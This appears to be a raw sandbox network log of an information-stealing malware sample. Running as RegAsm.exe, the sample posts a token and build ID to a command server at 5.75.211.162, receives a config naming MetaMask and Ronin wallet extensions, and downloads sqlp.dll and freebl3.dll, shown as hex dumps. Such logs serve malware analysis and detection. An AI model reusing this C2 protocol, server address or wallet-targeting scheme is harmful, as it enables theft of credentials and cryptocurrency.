2024-09-26 18:14:30 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GDAAKFIDGIEGDGDHIDAKCont
2024-09-26 18:14:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:31 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:32 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 5753 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:32 UTC	5753	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GIIJEBAECGCBKECAAAEBCont
2024-09-26 18:14:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49722	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:33 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:33 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:33 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:33 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:33 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 18:14:33 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 18:14:33 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 18:14:33 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 18:14:33 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 18:14:34 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 18:14:34 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 18:14:34 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 18:14:34 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 18:14:34 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49723	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:36 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:36 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GDAAKFIDGIEGDGDHIDAKCont
2024-09-26 18:14:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:37 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:37 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------DBFCBGCGIJKJKECAKEGCCont
2024-09-26 18:14:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49725	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:39 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:39 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------HIJEGIIJDGHDGCBGHCAACont
2024-09-26 18:14:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49726	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:40 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:40 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:40 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:40 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:40 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
